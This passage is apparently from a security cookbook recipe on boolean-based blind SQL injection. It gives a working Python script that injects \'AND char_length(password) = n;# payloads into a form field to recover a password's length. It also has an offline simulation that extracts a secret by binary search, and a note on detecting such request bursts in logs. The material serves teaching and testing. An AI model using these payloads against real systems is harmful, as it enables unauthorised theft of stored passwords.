Exploiting Boolean SQLi
There are times when all you can get from a page is a yes or no. It's heartbreaking until you realize that this is the SQL equivalent of saying I LOVE YOU. Any SQL injection can be broken down into a series of yes or no questions, depending on how patient you are: first ask the length of the value you want, then ask about each character in turn.
We will create a script that takes a "yes" value (the string that appears in the response when the injected condition is true) and a URL, and returns results based on a predefined attack string. I have provided an example attack string, but this will change depending on the system you are testing.
How to do it…
The following script is how yours should look. The page's listing is cut off after the length-finding loop; the part shown here has been reformatted and fixed (the original built `payload` once outside the loop, so `i` never changed in the request, and it was missing the comma after the URL):

```python
import requests
import sys

yes = sys.argv[1]   # text that appears in the page only when the condition is true
i = 1
asciivalue = 1      # used by the per-character loop that follows in the full recipe
answer = []         # collects the recovered characters

print("Kicking off the attempt")

# Step 1: find the length of the target value by asking
# "is char_length(password) equal to i?" for i = 1, 2, 3, ...
while True:
    # The payload must be rebuilt on every pass so that str(i) is updated.
    # 'injection' is the name of the injectable form field; adjust to your target.
    payload = {'injection': '\'AND char_length(password) = ' + str(i) + ';#',
               'Submit': 'submit'}
    req = requests.post('<target url>', data=payload)
    lengthtest = req.text
    if yes in lengthtest:
        length = i
        break
    else:
        i += 1
# (the listing on this page ends here; the character-by-character
#  extraction using asciivalue and answer is not shown)
```
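To make the yes/no approach concrete without touching a network, here is an added example (not code from the book): the page is replaced by a constructed in-memory oracle that answers only true or false, and the extraction is generalized from the linear "is the character equal to X?" walk to a binary search over the ASCII range, which is how a practitioner would normally implement it. The oracle also counts how many questions it was asked, since that request volume (dozens of near-identical requests differing only in a number) is exactly what a defender looks for in web logs. The class and function names, and the secret value, are all made up for this example.

```python
class SimulatedOracle:
    """Stands in for the vulnerable page: it can only answer yes or no.

    Constructed for this example; there is no network and no real database.
    """

    def __init__(self, secret):
        self._secret = secret
        self.queries = 0   # number of yes/no questions asked (what a log would show)

    def length_equals(self, n):
        # equivalent of: ' AND char_length(password) = n ;#
        self.queries += 1
        return len(self._secret) == n

    def char_greater_than(self, pos, value):
        # equivalent of: ' AND ascii(substring(password, pos+1, 1)) > value ;#
        self.queries += 1
        return ord(self._secret[pos]) > value


def find_length(oracle, max_len=64):
    """Linear walk, as in the recipe: ask 'is the length i?' for i = 1, 2, ..."""
    for n in range(1, max_len + 1):
        if oracle.length_equals(n):
            return n
    return None


def find_char(oracle, pos, lo=0, hi=127):
    """Binary search one character: invariant is lo < ascii(char) <= hi.

    Each question halves the interval, so about 7 questions per character
    instead of up to 127 with an equality walk.
    """
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if oracle.char_greater_than(pos, mid):
            lo = mid
        else:
            hi = mid
    return chr(hi)


def extract(oracle):
    """Recover the whole secret from nothing but yes/no answers."""
    length = find_length(oracle)
    if length is None:
        return None
    return ''.join(find_char(oracle, pos) for pos in range(length))


if __name__ == '__main__':
    # Constructed sample secret; in the recipe this would be the password column.
    oracle = SimulatedOracle('s3cret!')
    recovered = extract(oracle)
    print('recovered:', recovered)
    print('yes/no questions needed:', oracle.queries)
```

Two things worth noticing when you run it: the secret comes back exactly even though no single response ever contained it, and recovering a seven-character value took well over fifty requests. On the defensive side, a burst of requests to one endpoint whose parameters differ only by an integer is a far more reliable detection signal than trying to spot the injected SQL itself.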